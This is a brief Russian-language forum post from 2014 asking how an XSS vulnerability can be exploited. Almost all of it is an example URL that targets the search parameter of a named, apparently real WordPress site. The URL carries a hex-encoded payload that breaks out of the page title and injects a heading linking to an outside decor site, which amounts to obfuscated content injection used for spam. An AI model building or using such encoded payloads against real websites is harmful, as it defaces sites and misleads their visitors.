Допутим имеем возможность XSS атаки на сайт. Как это можно использовать? Пример ( http://homester.com.ua/wordpress/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x68\\x31\\x20\\x73\\x74\\x79\\x6c\\x65\\x3d\\x22\\x74\\x65\\x78\\x74\\x2d\\x61\\x6c\\x69\\x67\\x6e\\x3a\\x20\\x63\\x65\\x6e\\x74\\x65\\x72\\x3b\\x20\\x66\\x6f\\x6e\\x74\\x2d\\x73\\x69\\x7a\\x65\\x3a\\x20\\x33\\x30\\x70\\x78\\x3b\\x22\\x3e\\x3c\\x61\\x20\\x68\\x72\\x65\\x66\\x3d\\x22\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x77\\x77\\x77\\x2e\\x64\\x65\\x63\\x6f\\x72\\x61\\x74\\x65\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x2f\\x22\\x3e\\xd0\\x9d\\xd0\\xbe\\xd0\\xb2\\xd0\\xb8\\xd0\\xbd\\xd0\\xba\\xd0\\xb0\\x21\\x20\\xd0\\xa1\\xd1\\x82\\xd0\\xb0\\xd1\\x82\\xd1\\x8c\\xd0\\xb8\\x20\\xd0\\xbe\\x20\\xd0\\xb4\\xd0\\xb5\\xd0\\xba\\xd0\\xbe\\xd1\\x80\\xd0\\xb5\\x20\\xd0\\xb8\\xd0\\xbd\\xd1\\x82\\xd0\\xb5\\xd1\\x80\\xd1\\x8c\\xd0\\xb5\\xd1\\x80\\xd0\\xbe\\xd0\\xb2\\x20\\xd0\\xb8\\x20\\xd0\\xbb\\xd0\\xb0\\xd0\\xbd\\xd0\\xb4\\xd1\\x88\\xd0\\xb0\\xd1\\x84\\xd1\\x82\\xd0\\xbd\\xd0\\xbe\\xd0\\xbc\\x20\\xd0\\xb4\\xd0\\xb8\\xd0\\xb7\\xd0\\xb0\\xd0\\xb9\\xd0\\xbd\\xd0\\xb5\\x3c\\x2f\\x61\\x3e\\x3c\\x2f\\x68\\x31\\x3e )
Изменено:
ANDRIY - 27 Апреля 2014 14:12